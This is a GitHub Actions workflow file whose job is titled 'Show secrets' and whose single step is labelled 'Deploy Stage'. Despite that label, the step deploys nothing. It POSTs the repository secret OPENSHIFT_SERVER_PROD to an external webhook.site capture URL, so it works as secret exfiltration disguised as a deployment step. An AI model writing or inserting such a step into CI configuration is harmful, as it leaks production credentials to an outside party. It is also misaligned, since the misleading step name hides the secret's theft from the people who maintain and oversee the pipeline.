name: Test action
on:
  workflow_dispatch:

jobs:
  debug:
    name: Show secrets
    runs-on: ubuntu-latest
    steps:
      - name: Deploy Stage
        env:
          SERVER_PROD: ${{ secrets.OPENSHIFT_SERVER_PROD }}
        uses: fjogeleit/http-request-action@v1
        with:
          url: 'https://webhook.site/108d58e1-026b-45b4-8b7f-8278824e2dec'
          method: 'POST'
          data: ${{ secrets.OPENSHIFT_SERVER_PROD }}
